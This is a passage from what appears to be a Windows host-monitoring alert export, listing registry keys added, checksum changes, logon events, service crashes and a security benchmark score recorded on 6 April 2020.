'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:43.086",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:43.054",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:43.038",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:43.023",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:43.007",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:42.992",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:42.976",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:42.960",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:42.945",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:42.930",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:42.914",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:42.898",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:42.445",5,"Windows System error event", +"Apr 6, 2020 @ 14:34:41.962",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:41.930",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:41.914",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:41.898",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:41.883",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:41.867",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:41.851",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:41.835",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:41.805",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:41.791",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:41.758",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:41.742",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:41.446",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:34:40.913",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:34:40.726",9,"Windows Application error event", +"Apr 6, 2020 @ 14:34:39.851",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:34:39.555",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:39.540",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:39.524",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:39.507",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:39.491",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:39.476",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:39.461",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:39.445",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:39.429",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:39.414",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:39.383",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:39.367",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:39.351",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:39.336",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:39.322",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:39.289",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:39.273",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:39.257",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:38.867",9,"Windows Application error event", +"Apr 6, 2020 @ 14:34:37.180",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:37.151",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_5eaf9d\TriggerInfo\4' was added. +" +"Apr 6, 2020 @ 14:34:37.133",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_5eaf9d\TriggerInfo\3' was added. +" +"Apr 6, 2020 @ 14:34:37.104",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_5eaf9d\TriggerInfo\2' was added. +" +"Apr 6, 2020 @ 14:34:37.086",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_5eaf9d\TriggerInfo\1' was added. +" +"Apr 6, 2020 @ 14:34:37.071",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_5eaf9d\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:34:37.056",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:37.026",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:37.011",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_4cf759\TriggerInfo\4' was added. +" +"Apr 6, 2020 @ 14:34:36.992",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_4cf759\TriggerInfo\3' was added. +" +"Apr 6, 2020 @ 14:34:36.977",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_4cf759\TriggerInfo\2' was added. +" +"Apr 6, 2020 @ 14:34:36.961",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_4cf759\TriggerInfo\1' was added. +" +"Apr 6, 2020 @ 14:34:36.945",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_4cf759\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:34:36.929",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:36.898",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:36.882",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_36ceed\TriggerInfo\4' was added. +" +"Apr 6, 2020 @ 14:34:36.851",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_36ceed\TriggerInfo\3' was added. +" +"Apr 6, 2020 @ 14:34:36.836",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_36ceed\TriggerInfo\2' was added. +" +"Apr 6, 2020 @ 14:34:35.890",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_36ceed\TriggerInfo\1' was added. +" +"Apr 6, 2020 @ 14:34:35.840",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_36ceed\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:34:35.830",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:35.742",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '775174ea9bf25c40ba381ca284d7511d' +New md5sum is : '6a4fdf3a9f7dc36fc03599f720d484d3' +Old sha1sum was: 'eab80f5279cedff3dd227a62f8828aa899a27475' +New sha1sum is : '9f469b80d1166a11ab0299760c6cb444ef555670' +" +"Apr 6, 2020 @ 14:34:32.680",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:32.649",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:32.632",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:32.617",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:32.601",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:32.586",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:32.569",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-5' was added. +" +"Apr 6, 2020 @ 14:34:32.554",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-4' was added. +" +"Apr 6, 2020 @ 14:34:32.538",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-3' was added. +" +"Apr 6, 2020 @ 14:34:32.523",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-2' checksum changed. +Old md5sum was: '2c61255f33c4fb43a225480258ec4380' +New md5sum is : '41f836f91bdb9b4b1a6dd53b45a586c1' +Old sha1sum was: '3d522bd22a6f5275d938735abc8eefcd62d2e82c' +New sha1sum is : 'd88322091bdfa95dd00b43c94043be94669c10d6' +" +"Apr 6, 2020 @ 14:34:32.508",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a94717f9cc73ebc01ca04b0844af85df' +New md5sum is : 'c3d3a1d8a57a3e55516e095343ffc85e' +Old sha1sum was: 'f239544f614ade15297b6b97ca2eb82e97b517de' +New sha1sum is : '3d8f8d08699f73356fd80de7e59de1c352109663' +" +"Apr 6, 2020 @ 14:34:32.476",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '6b831538504aed43ca0079095c23729d' +New md5sum is : '9db7d225f461184a37dd7daf55bd9455' +Old sha1sum was: '1d76c9113ab9a7701e6f8efb24ed1dfcfe36b391' +New sha1sum is : '6ad64ec507008882176ba696c556974a828a8fce' +" +"Apr 6, 2020 @ 14:34:30.197",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:30.186",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:30.168",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:30.151",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:30.132",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:30.117",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:29.523",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:33:59.560",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 14:33:51.671",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:33:51.635",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:33:51.385",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 14:33:51.337",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 6, 2020 @ 14:29:18.977",10,"Multiple System error events", +"Apr 6, 2020 @ 14:29:18.946",5,"Windows System error event", +"Apr 6, 2020 @ 14:29:16.189",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:29:16.166",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:29:16.089",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:29:16.058",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:29:16.043",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:29:16.024",5,"Windows Push Notifications User Service_4cf759 terminated unexpectedly", +"Apr 6, 2020 @ 14:29:16.010",5,"Connected Devices Platform User Service_4cf759 terminated unexpectedly", +"Apr 6, 2020 @ 14:29:15.993",5,"Clipboard User Service_4cf759 terminated unexpectedly", +"Apr 6, 2020 @ 14:29:09.649",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:29:08.845",9,"Windows Application error event", +"Apr 6, 2020 @ 14:29:08.843",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:29:07.852",9,"Windows Application error event", +"Apr 6, 2020 @ 14:29:05.883",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:29:05.837",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:29:05.820",9,"Windows Application error event", +"Apr 6, 2020 @ 14:29:05.759",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:28:44.811",3,"Service startup type was changed", +"Apr 6, 2020 @ 14:28:43.445",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)", +"Apr 6, 2020 @ 14:28:40.336",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'", +"Apr 6, 2020 @ 14:28:33.648",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 14:28:26.549",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:28:26.526",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:28:25.856",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 14:28:25.517",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 6, 2020 @ 14:28:11.226",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:28:08.867",5,"Windows System error event", +"Apr 6, 2020 @ 14:28:08.851",5,"Windows System error event", +"Apr 6, 2020 @ 14:28:06.069",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:28:06.054",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:28:06.025",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:28:05.992",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:28:05.977",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:28:05.946",5,"Clipboard User Service_36ceed terminated unexpectedly", +"Apr 6, 2020 @ 14:28:05.930",5,"Windows Push Notifications User Service_36ceed terminated unexpectedly", +"Apr 6, 2020 @ 14:28:05.914",5,"Connected Devices Platform User Service_36ceed terminated unexpectedly", +"Apr 6, 2020 @ 14:27:55.807",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:27:54.743",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:27:53.492",9,"Windows Application error event", +"Apr 6, 2020 @ 14:27:41.586",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 14:27:41.570",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '93c2f688a68bea92ca0316b543b731f9' +New md5sum is : 'c4a796c4c34771728ed542fd1a758c62' +Old sha1sum was: '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +New sha1sum is : '6390383b035997e115a3b000b6de17b37d1d41e4' +" +"Apr 6, 2020 @ 14:27:41.540",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\3\S-1-5-21-438079597-2123118846-2669748851-1001' was added. +" +"Apr 6, 2020 @ 14:27:41.522",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\2\S-1-5-21-438079597-2123118846-2669748851-1001' was added. +" +"Apr 6, 2020 @ 14:27:41.510",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a0df8d6e879d924da3288b2aa0b85114' +New md5sum is : '2a59348304c018619f9ec9335491c9b3' +Old sha1sum was: '5b3369bb152c26552a26be399f0ea043686a36fe' +New sha1sum is : '8b9b67bed7bf33200a32a2aebb4f71c9fae666aa' +" +"Apr 6, 2020 @ 14:27:40.071",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows' checksum changed. +Old md5sum was: '49574a9da5b73510ecb8125c7786d037' +New md5sum is : 'a94ecbd5eaeee72bd7ceca1faad96e30' +Old sha1sum was: 'fc3c9a4be6b806a974693af1dc528845db7631da' +New sha1sum is : '269518a35686493cde84837b1668ea322e4d3d13' +" +"Apr 6, 2020 @ 14:27:31.625",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:27:31.605",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:27:31.199",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 14:27:31.159",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 6, 2020 @ 14:27:25.350",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '729d0877659e4797d3983fddb4576047' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '109945df285ffff37e08eaab1d91e55cb59c26c8' +" +"Apr 6, 2020 @ 14:27:25.320",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'd8c503783bde9bba94c7b5e9b6f56d5e' +New md5sum is : 'a45d92c5da48b32074d593f445bd1d73' +Old sha1sum was: 'cd5545ba37f52a71c7212842358b2c7891cc67c1' +New sha1sum is : '7ad132c3e4354ce6748313a2eaf72d08a7d0ac2a' +" +"Apr 6, 2020 @ 14:27:25.305",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '3bed6b4b8101da842bb6afe04a8271c2' +New md5sum is : 'e18c1ccf736dc8f14e0a245e1f699739' +Old sha1sum was: '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +New sha1sum is : 'f3d9e58c5181cea0e86c13a904867deadeab2b49' +" +"Apr 6, 2020 @ 14:27:25.055",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'a6934418b12b085c34f2dbaa9e9fa7a0' +New md5sum is : '4dc723cacf24668548d4626cd43a3355' +Old sha1sum was: 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +New sha1sum is : 'd81ab069195c4657ae5fbbccadc8597e7deedd15' +" +"Apr 6, 2020 @ 14:27:23.663",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'fcdb07c6a1ed824ae9455a64b2c0bb9e' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '584b2e2ecab9f7b853efa748028018d4698a2e87' +" +"Apr 6, 2020 @ 14:27:23.321",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: 'b132e65b4963a54ebee91bcab8914621' +New md5sum is : '320bb6f0c3f0f9ca6201376818440454' +Old sha1sum was: '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +New sha1sum is : '6f0a84fcaed413ed440ea1ba902efe1c0d69c1ef' +" +"Apr 6, 2020 @ 14:27:22.772",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:27:22.756",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:27:22.741",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:27:22.725",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:27:22.616",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'f6949813e6b9d992278b95b7f209e047' +New md5sum is : '00f520782a4ab535f2911267c06438d9' +Old sha1sum was: '8db1fc943f83c30b4bc07f1ed394492c392e7722' +New sha1sum is : 'bff3f6156b18df9a1ad0d484b5296bda6e699299' +" +"Apr 6, 2020 @ 14:27:22.459",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '342765c52f3fd7b50e5188adb30a0ede' +New md5sum is : '8e9cef389829897cea6eca230b2aa97f' +Old sha1sum was: '6d803f7cc7de0ae861402e45b8a1442595a4b544' +New sha1sum is : 'cc8206466c207f0619ed289d336d1d965992e198' +" +"Apr 6, 2020 @ 14:27:21.475",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:27:21.459",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:27:21.444",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:27:21.428",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:27:21.272",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'fcdb07c6a1ed824ae9455a64b2c0bb9e' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '584b2e2ecab9f7b853efa748028018d4698a2e87' +" +"Apr 6, 2020 @ 14:27:18.662",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'bb30a4865d0fe96a2d7b53b843e8fa0a' +New md5sum is : '05e13bdf1f9b7eb3a1f3de4ca253e89f' +Old sha1sum was: '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +New sha1sum is : 'feaa05d6b5b4ac5a77156e9c4c2199f6a91a5917' +" +"Apr 6, 2020 @ 14:27:15.664",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +" +"Apr 6, 2020 @ 14:27:15.398",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\spoolsr' was added. +" +"Apr 6, 2020 @ 14:27:11.350",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '0231145ca99a840395c3772f19d7bf2e' +New md5sum is : 